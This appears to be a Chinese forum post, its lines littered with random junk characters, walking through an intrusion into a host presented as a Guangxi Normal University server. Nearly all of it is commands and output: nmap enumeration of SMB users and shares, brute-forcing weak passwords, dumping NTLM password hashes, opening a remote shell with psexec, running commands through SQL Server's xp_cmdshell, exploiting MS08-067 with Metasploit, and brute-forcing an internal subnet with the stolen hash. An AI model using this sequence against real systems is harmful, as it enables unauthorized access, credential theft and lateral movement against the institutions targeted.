广西师范网站http://202.103.242.241/
8 y8 [7 U) n2 v3 y4 G+ T
* ]0 ^# Z% j4 P) d2 i9 @root@bt:~# nmap -sS -sV 202.103.242.2417 e0 e) A9 j) i5 m$ \
+ Y$ ?7 X2 f. F7 H2 o1 c: { j; R
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST# J: a% g: C" x
; r8 Y' i/ W3 S0 e$ ] R1 d
Nmap scan report for bogon (202.103.242.241)
7 J; B* a4 q" h x |# `6 _3 o' g2 y* R1 ] P: }
Host is up (0.00048s latency).% Y+ A4 q8 x1 j9 J! Y$ N+ L! n- A
1 D0 Y$ E: V. xNot shown: 993 closed ports/ N' I, `' u2 X, K! Z @
) @2 r s5 m2 C3 ~1 n5 o ]) l
PORT STATE SERVICE VERSION$ l& i- |, [3 I
2 n' _4 Y3 x0 o7 T2 X- G5 O135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)/ k% v+ `& y- I4 J: N# Y" a
1 Q3 o/ T9 p6 v/ m; Y
139/tcp open netbios-ssn
3 J) E# E5 l/ h6 b
2 ]1 u' m# f6 u- ~: j& p+ O445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds( o( E- l7 r2 x3 l0 u @( I
2 s, B+ w: N+ G8 s3 X
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)3 F! I( R" ] `5 f, Y+ r
0 y. \' {. u4 d+ ?1026/tcp open msrpc Microsoft Windows RPC
, F) X% ^8 J' W& o' `$ s. a( r# I6 I D: O( S K" l
3372/tcp open msdtc?( m; O* r h2 z
" R' L a) G8 J+ [3389/tcp open ms-term-serv?
- n% x1 l7 [2 k5 ^' |
/ E& ~& Q) h' e) H: A% c1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :7 S) S0 O6 d6 t. G) c
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
7 l4 L. I' ?$ w' y3 L; h
( Z/ m# {9 |" k9 f+ m& l* z0 YSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
& ^3 _* ` ?/ L9 l+ U ?
9 d* Z( e0 l! f; n+ cSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
9 b/ g8 o) P: k3 I# C" y; p7 J! m$ c0 X% G: O6 n8 H- z
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
6 G: D/ D c( ]" t+ W* N0 w @ B N" [' X; |" V2 W0 b
SF:ptions,6,”hO\n\x000Z”);! i' v. p* h$ F1 s$ Y
a5 f X9 N( G" {MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)5 G- o! @3 k$ H" l, _& x+ {# K) B
( L, [$ F' U& I% G( D
Service Info: OS: Windows5 {" ^( _6 t/ i- G/ z* ~2 `8 }# N
( s J8 K. Q A5 c( C) j: oService detection performed. Please report any incorrect results at http://nmap.org/submit/ .# k9 e5 Z8 k, d$ P; b4 A
& l2 r8 _% z1 s* U
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds0 {2 v# W4 r, C0 N* b; |
1 C) e s8 W) D( a$ Troot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本0 ^4 K0 G; m- `) \' _8 z
* s! a' W5 K3 g! }* W: C- d
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
9 D$ f- ]) @: t, q) ~" I( u6 Z: a* _% y" P1 I( [: C3 K5 k9 q
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse% h6 E* D4 O8 k1 C& E% W0 ^2 n
& l0 g! {* z$ ^3 N( }-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse1 i# `0 W: U' ~9 Z" I
S! \$ A$ \4 e, N5 ~ B" Z+ c3 X. L& H-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
# D/ f9 i% v$ {+ n! b( D5 V8 `, r% }1 @. V
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
6 u9 w6 A" t0 k4 ~' Y
- V* _9 L/ b o: v; W* x% w-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
2 Z8 w+ O, @7 o; y0 i% l
2 x9 A2 W& B9 Q8 J) d1 V& \2 E+ Y-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
" l4 u% p2 S7 A7 p# S# J: o
6 k) ^8 |2 m, _- ~) a, |-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
5 f8 m6 q1 F( e0 f! i8 G
& ~$ G% _( k# w9 K# N. g-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse6 S: B5 n: N5 U2 V
9 r) x( L: K5 h* f% z l' u-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
% `' P% h: a* m f& O
- V# U! y+ `. X# J8 r: ]-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse9 B3 x: B* }9 _% E& Y
! m! Z* [# f+ ?! d
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
0 k( N+ w: ^) D; r! I
9 N/ a# t. ]+ X8 S1 _: A/ b1 T+ Y-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
1 p* }0 g! \. l2 i1 t! r; l
* P% G8 d/ i- m9 Z* Q' A) a# T-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
! t& ^! \/ H) `. @, P1 g0 V! o( k( W- k0 E4 _; t' M
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
' z4 J& J, q6 c& c/ B7 p: J. ^- V: a. Z1 F: g
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 $ u3 v; q% I, `$ K M
2 i0 K5 E: n- W! K1 A1 e
//此乃使用脚本扫描远程机器所存在的账户名0 \5 ?* x% z3 ?+ g: {1 r
( b0 o4 E; u: W: t/ o7 U: k+ KStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST+ b1 x9 a) _: _
f. @& }8 L) x. V6 G
Nmap scan report for bogon (202.103.242.241)
6 u) B/ ~& ~# \( N' O8 g0 v0 a
# I* a3 a- s/ m- ^8 ~( i4 LHost is up (0.00038s latency).
5 W! F. ?7 a4 D7 u! D$ G: d/ X8 W6 w7 p; w* V& ~4 U
Not shown: 993 closed ports$ e/ U. `" l/ ?3 B* H) h" N
6 K2 `' q/ Q4 |# E! A0 e& Z
PORT STATE SERVICE2 c. Q' `5 P; A2 `7 P. w
- c$ T3 T! W1 O+ X( |
135/tcp open msrpc
' h* Y" J( o* c5 |+ F0 T& p. x7 }6 p) Y
139/tcp open netbios-ssn7 v* w* I8 E1 j3 S! [
' c5 G; Z% D1 Y/ | T, Z
445/tcp open microsoft-ds
- D& H u+ M; ~: V6 J% k' s9 e4 I, Y6 S/ i
1025/tcp open NFS-or-IIS6 R. s3 M' H! K6 c6 Y
* e3 p8 ~: ~ ]1026/tcp open LSA-or-nterm
0 s7 J( v9 L, p7 Z0 y9 c4 |# V& @, K3 u, W
3372/tcp open msdtc9 ~& b" w7 Y9 P8 z a+ k
' o+ W# M. }& S! L7 Q1 P
3389/tcp open ms-term-serv
) D4 d P: m3 Y/ t" u2 Y' e: D- H* @* Q0 S: e/ S' n9 w, F# z1 ?
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
$ j2 t$ B% w% T1 L
/ a7 P& X$ u6 M9 T, {# t% EHost script results:
! R' M. W* G4 g9 @, g+ i, k, h
4 n' Q t R! K' `% w9 t| smb-enum-users:
' C( t* x2 b0 Y8 C& A( M1 B* P* v
0 k! _0 |# l( l# `. c" N5 [. _5 V0 m|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果4 {' i1 S/ l3 s2 Q* E! R7 S
; \, m, Y; D& t6 w
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
5 |. j9 X! W# i2 W# m7 ^( w: X+ k4 H& P7 f3 J8 q7 g2 M
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 8 @% X7 v7 v/ U9 w3 t3 W; n) B
) F( o% d q* [% [) s9 D
//查看共享1 k5 @. {: o2 x# k; n
% J q0 k; Y \Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST5 u, {2 C* w% l" ?* A2 b
/ b6 {$ P( y2 B4 u, T6 P- w5 K7 E
Nmap scan report for bogon (202.103.242.241)# y) d, B3 P( ]5 @8 M) u, o
8 \ ?% ^. Z$ y7 F- w: K7 ^Host is up (0.00035s latency).3 B2 |& {' c6 C' U+ M
1 W: {: q a* G' f% _8 xNot shown: 993 closed ports; t& {) s& n# g* B; |: a. _
$ R. {/ e$ l# S+ d8 i$ A/ Z
PORT STATE SERVICE" J5 i. h9 f5 I ?* k7 |
2 i3 C" y) C; _ U4 c8 J135/tcp open msrpc9 P% f+ f0 q9 e
2 }* i8 T" ?3 P6 e' _139/tcp open netbios-ssn
8 L$ r: j% \( z7 P# A" \) N# ]7 z0 _7 k, a9 N5 A
445/tcp open microsoft-ds
( w# ?6 `4 T8 T, O* N3 L; W
# ]7 i8 w; U3 k0 G7 h1025/tcp open NFS-or-IIS) d4 Y% [6 q' O a2 e
! f# G3 j- J' X" {% a
1026/tcp open LSA-or-nterm
0 w4 Y7 c$ j9 M( }6 Q
- O2 E2 l3 J1 Q0 \0 E3372/tcp open msdtc; w, p' e* Y3 R, h6 }9 O. `
9 \6 D e1 |# l9 l1 p$ }+ E1 {& m3389/tcp open ms-term-serv% f( [5 {; V, w
: s O, f$ ~ ?+ G1 Q" I( n! yMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
* h$ n, e4 Q- Q7 ~7 o
- m3 C3 F; u1 PHost script results:
# M0 k9 v2 x3 A
2 s! C. `6 }% J# [) a# B" F| smb-enum-shares:( o6 Y7 t. b. r8 a$ \) S5 ]
) k2 i5 a. V) j' u9 M' c
| ADMIN$
3 R$ |0 c2 ~& r* c
3 r* U( H1 X8 Z9 g( {. h3 X1 o' z| Anonymous access: <none>4 w$ P/ o1 U1 H( ^% H
' n" _( p! V% X. K! a% d( X
| C$
! G0 O9 u2 y( W7 W, E( H- `7 J5 c/ I( z1 r. D' L$ e S
| Anonymous access: <none>
% _* p2 B1 ]4 _0 ], M! h, K
) Y: ^- C; W7 s# g: g! A: @1 K' v| IPC$) h2 s7 d$ ~9 ]# E) v; l6 X
8 {/ O! k1 b) k4 _& F. y' u/ t. r
|_ Anonymous access: READ
" O6 ^' u) l, U) z7 @
. x1 d) m$ `3 HNmap done: 1 IP address (1 host up) scanned in 1.05 seconds+ `, @4 R# B5 l' C( Q* u: S
$ e' b" I! ^' C. B/ u& d7 uroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
& i4 ~0 S/ G7 N0 Y- W# ]/ v, S, m
//获取用户密码
5 U# @) v# F5 c! m, W: u4 {3 E' U @/ z6 T Z* @* Q* j
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
( Z' y6 T) V# E
5 b0 ^; A6 q. ]Nmap scan report for bogon (202.103.242.2418)
% S2 u4 G- y: [
8 s' ~. L; E# MHost is up (0.00041s latency). w3 p( v5 u9 P( {
/ h) [5 q \0 y: P/ T. P
Not shown: 993 closed ports& S' ^2 q: q1 _! {1 r U& a; G$ J* U
3 M- |1 ~/ T( F/ ?& ^6 w2 b& P
PORT STATE SERVICE" W. U, J2 [; l Z0 B4 E
6 s9 B) I, H7 U$ z1 l
135/tcp open msrpc
) i' J- D- r1 I# n* y. j c( a: Q E
139/tcp open netbios-ssn
4 m$ a/ O) q3 W; e( |/ [3 [
" Y6 e$ g9 ^1 J, A4 Q3 G% {: E445/tcp open microsoft-ds
0 f W! i7 X T
, A( \' a/ z( g. c2 E$ e: I' y. Y1025/tcp open NFS-or-IIS
- r. J# Y* l0 @# p+ q/ T7 @3 G2 c2 f/ M q1 |2 D
1026/tcp open LSA-or-nterm
& P8 n7 Z0 E0 h
) U- V! s+ ^; y9 E2 _6 p4 y/ e/ V3372/tcp open msdtc
2 v: L4 b+ M. O% J1 H1 Y6 v4 M& |$ _# d2 Z; t
3389/tcp open ms-term-serv
+ e! |* b' s8 |5 @" q2 P$ v' B: ]9 H7 {$ S
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
2 Z" ]: T- Y1 |0 s- L* w* [$ t+ V B: u; }. w
Host script results:8 C- d; B' b3 J8 z" w2 \
7 {2 p C3 ?- z/ }3 i| smb-brute:- I q' L( O2 M& h
# M' M) f/ k, ^6 j2 K2 Z
administrator:<blank> => Login was successful: u; O9 k: l9 G. A- P+ W A
0 t9 I) G# a6 s* T# B) A- j: _
|_ test:123456 => Login was successful
9 t# z) O/ x5 N& W3 [ o7 ~& Z. u
8 |( r3 g& n5 N3 g- HNmap done: 1 IP address (1 host up) scanned in 28.22 seconds9 R( a8 n* ^( e/ S: h& o m
8 V) m( T0 w$ v2 O
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
+ _ R3 q# o5 |+ E; K1 h% J* Z3 X9 o; s& x7 P8 p* W4 k$ E6 C3 ]
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data+ C" `5 q' l% c1 R; W' R' X2 a
3 o+ y: Y6 R/ r7 {- `root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
8 \* X& H8 w% F7 }9 |7 I4 P9 v4 V8 i# Q5 f, O3 ]3 m, }
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139: }* W" m" `. t, Y; Z
- D1 x# `- F" s* L; p. s+ X
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
1 j4 f. T8 t8 Q% Q3 T4 g; [3 ]# M0 t3 r
Nmap scan report for bogon (202.103.242.241)6 o8 W( R' r/ {" I
) w) H* Q( N3 t7 w; U
Host is up (0.0012s latency).
+ U( V( W: W* y* z* H) a4 E( s- Q7 @
PORT STATE SERVICE
7 ?9 Y2 G* z" _2 ?2 X
8 d0 _2 y) M4 F/ w135/tcp open msrpc0 ]1 e2 }- k5 W. j9 B k8 O1 Z
* ?# z- A2 u' s5 f139/tcp open netbios-ssn
) x) `) [# i0 h( y$ H& G
; @# ~; d8 J/ \6 h% _445/tcp open microsoft-ds/ c7 T* h4 g1 f
" I2 J q! |) x
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
" A! a( R, k/ I' D G( I/ N& W
/ T$ F9 N/ m( ~8 ^Host script results:2 Q" u* c: N7 c7 K$ [
1 @# s; S" f( | I1 l
| smb-pwdump:/ F5 s! F$ H0 O9 z" l9 T: j
1 H% b2 R y6 w
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
! `1 B4 U- z& q0 A
9 f N# ~- p. Z1 ?| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
7 W" d' {5 Z- M: J& B3 J4 B. ~' y& y; H' J5 a; B
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
" u; F6 |: U9 A9 a+ G
4 i; j3 y5 w. p; ]1 Q# s|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D23 G/ ]( V, i- F+ k
& Y7 I. g+ I9 K% y+ GNmap done: 1 IP address (1 host up) scanned in 1.85 seconds
' b3 H8 R) X+ t, t# C* W- s
# ]& b& f, f5 `1 o$ Q# U* N$ DC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell+ a) t Z, B( [
# z4 B- z9 v, z-p 123456 -e cmd.exe
9 [3 r2 [' {/ l0 y
3 x) t; f" H7 ^5 G. XPsExec v1.55 – Execute processes remotely
; Q( C0 M: W5 Q7 N
+ R5 r( n2 O5 L3 f: ^$ iCopyright (C) 2001-2004 Mark Russinovich
( ?6 l' ]9 j3 w3 l2 S1 g* \- b
Sysinternals – www.sysinternals.com
# A8 W6 c* g) b# h
( u; h' ?1 \" ~; d: r; `5 xMicrosoft Windows 2000 [Version 5.00.2195]
- N+ }! J" ?/ e* \- S# C, ~# x1 C/ O
- @6 i, ]. \+ Y3 i( [( v" s(C) 版权所有 1985-2000 Microsoft Corp.
9 H' h; i5 p+ {7 G4 {! m& v. H0 P8 m, N
, D8 R! Q) t* W5 vC:\WINNT\system32>ipconfig& k% ^, N' h; c0 @
/ Z6 w' ?6 X$ _$ J8 F% `
Windows 2000 IP Configuration- X: U, e9 k# S; K& @, P8 F+ V7 Z
4 P4 m3 Y# z3 REthernet adapter 本地连接:
; Z8 K- q: C# D6 K# P8 _* Q0 v& p1 d) N; \7 n1 g6 u
Connection-specific DNS Suffix . :' l% q! i) B, T% B
' U: ?6 f7 A6 v" a. `# q
IP Address. . . . . . . . . . . . : 202.103.242.2415 d2 S0 r/ ^8 p% i: M" f V! C
' r5 V* x$ l+ P
Subnet Mask . . . . . . . . . . . : 255.255.255.0
. d5 Q: o D; j" A
1 T6 O5 Z1 h/ [1 @. ^- o$ }+ cDefault Gateway . . . . . . . . . : 202.103.1.1
7 i6 u$ O& e* i
5 ]/ E% k% X7 O1 I5 A% AC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
4 G: [& b# `; y& @3 }$ B9 U) e* P0 U9 F1 i; s. E) `. X( p2 j6 m' A% V
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
; D7 }1 F1 R: R. B: v
! a- n) |1 k3 M9 l7 q; UStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
* T3 G# _+ [$ R# j9 Q4 D& r1 N' G5 D% X# m* Z
Nmap scan report for bogon (202.103.242.241)
! R1 Y# G. ]2 {; \/ |/ \) _8 c. a: x
Host is up (0.00046s latency).
7 ?5 n$ ~6 _4 i* ?: D, M" j4 h6 Z9 {8 t5 \$ {2 y# s
Not shown: 993 closed ports
0 D( ^9 ~6 k; c0 U3 [9 ~* p8 Y9 g. J: `
PORT STATE SERVICE
0 f4 _7 d( v+ _$ A: V2 A% a7 H5 f, ~# z# r5 P
135/tcp open msrpc/ l0 Y1 v( L6 w, i# m2 H' s
8 \/ w- k" f, J+ D0 ]) h
139/tcp open netbios-ssn( Z) {8 g c& O6 f8 A
6 A* o! z B& J* b p445/tcp open microsoft-ds
& t }6 F2 n8 ^& P6 f. o1 {
; a! i: M1 a0 `/ }) e' D6 F" @) W8 R1025/tcp open NFS-or-IIS& Q) N- a: t- ^& W$ ~& \/ n
4 k9 Y9 K" ?- Y1026/tcp open LSA-or-nterm
5 j0 ] \% J- {8 ~5 X2 V! b# a4 V, f: n* a7 p
3372/tcp open msdtc5 i' a% w' G+ O
/ q9 [" V8 o. D G3 N) i
3389/tcp open ms-term-serv
4 P; N2 x9 s/ ^0 C) a
0 B7 D f- X `! q0 p$ p- uMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
- I7 y* `1 S* h8 {; W9 d$ d) z5 M6 v. w, w
Host script results:: b8 |5 j5 v5 x3 d
- c% J# i: @4 c* d' v- o6 c; g| smb-check-vulns:' u. D' n3 _) n. H
& |5 j4 Y; }3 a* H7 F|_ MS08-067: VULNERABLE% S5 F$ b5 D1 a4 ^( o9 {, ^& b' ~2 y) _
! X! H- h6 }; m7 ^
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds9 q2 d; E8 H7 z& n
- _1 d, W i9 A# q$ b8 |% W; mroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
" @8 \7 ?* P' m3 D5 v r; b* A( Z
, k4 p: R! b# P; \4 Umsf > search ms085 J8 R* M1 I# v- T. r5 H; g( D# q
5 d0 F1 {; ^& m' t. vmsf > use exploit/windows/smb/ms08_067_netapi
0 i6 V7 k8 M- ^) G0 _' b
$ T, t2 y4 S0 Gmsf exploit(ms08_067_netapi) > show options
4 s, q$ I, m& e; l+ Z* g8 N& [3 \9 ~$ M2 e. d o
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241+ c& @: x: ~2 s. n7 s/ T
4 a( j/ R2 D4 a- }
msf exploit(ms08_067_netapi) > show payloads4 u5 N/ `% h7 [( A; O$ j I
D0 \; ^3 d# H5 U2 A+ \msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp0 L* x& y7 a& y( `+ [
' Q1 ]4 y/ R" U+ M4 F8 I
msf exploit(ms08_067_netapi) > exploit' F3 B' X9 Y: s3 _* K5 g6 y" }
4 {' o9 y' H1 G/ C
meterpreter >
* j& k- _- j; ?. q0 p( k& \
7 ?! t; e% o5 |3 ? i0 kBackground session 2? [y/N] (ctrl+z)# m/ o3 s m# t$ |
7 c g/ i6 ^. Q9 I
msf exploit(ms08_067_netapi) > sessions -l
; T$ F, k9 s. `3 g( q6 J( q! T2 M+ t) P! }- b4 X( M
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt! T/ v( @, x& L: C% k# a
5 h8 V. f. L. k" x% N6 `. E
test5 o' S! i+ m: ]' o% S- Q1 i% R
0 S0 n% q* f1 J# {+ @4 b1 }) m2 wadministrator# |. ]2 J5 x" c% C: x
7 d3 U. P: [0 V0 u% z
root@bt:/usr/local/share/nmap/scripts# vim password.txt/ |' Q8 ]0 G. z, I1 M" \
: W" J( v9 @% a& [+ W# t7 }; \. n44EFCE164AB921CAAAD3B435B51404EE+ Q; y# _% d0 v6 ]
$ G# a, J+ N/ _) a# d2 t3 I
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
+ p i) F- M8 a. X( ~# o
0 l7 _. U) w! I! q3 C7 l/ _# D //利用用户名跟获取的hash尝试对整段内网进行登录, c" l, b' }7 T8 n1 A
9 M( q7 _- k+ ?# c' }9 |' T: SNmap scan report for 192.168.1.105
: J6 @" {% c0 I6 C) h
& a( }# z3 ~1 P K5 Z, oHost is up (0.00088s latency). o; x* Y/ p) d/ d7 k4 ?; Z# i4 _ H% W
% s6 \& ]! F' l$ VNot shown: 993 closed ports
( G6 n( E, a! v; p! X3 D2 C7 r, M& z0 p7 [- v+ w$ |
PORT STATE SERVICE
# n) F, q% Y, k+ }
2 F, G) q, w* Y" U. O( V135/tcp open msrpc
+ A8 r7 U, t: f" X; t, A6 y6 Z6 f" I* \% }7 h& D
139/tcp open netbios-ssn1 X7 f/ \3 v* p- D* h
6 ^5 X: {3 q" [/ h/ o! q, \
445/tcp open microsoft-ds
8 B! g$ v8 j3 @* g* @& h# i0 `9 Z+ Q' ]5 f( B
1025/tcp open NFS-or-IIS. S# `% {8 v) M( c. n/ F3 j" i5 t
# I( _+ T w) q& ?8 E" ?: H
1026/tcp open LSA-or-nterm
& j" p# o0 t3 B: h* A# m- I2 b3 j8 \$ e$ v6 P
3372/tcp open msdtc% Z7 h2 r5 }& O1 x
4 Y- I( Y% l' K W$ `, [9 K
3389/tcp open ms-term-serv
! T% B- s7 U' I4 T) C5 o @" ]) I" v+ U, a* }% r E6 b
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
( n. M( m t1 p* t! D. L0 J0 n5 _& ]" `+ B
Host script results:! |2 r; h7 e1 Z: \
0 q+ S9 f4 Y1 n2 e6 Y2 {| smb-brute:! g5 {) B+ m" R+ r0 ]0 n, p
% E% B2 I, i* B|_ administrator:<blank> => Login was successful [( h- O, S, q" Z, s
& x2 I1 F8 |5 ?2 Y" w
攻击成功,一个简单的msf+nmap攻击~~·4 T5 j# t2 Z3 `! ?9 Y
- O2 T1 b. l. r: E) B
|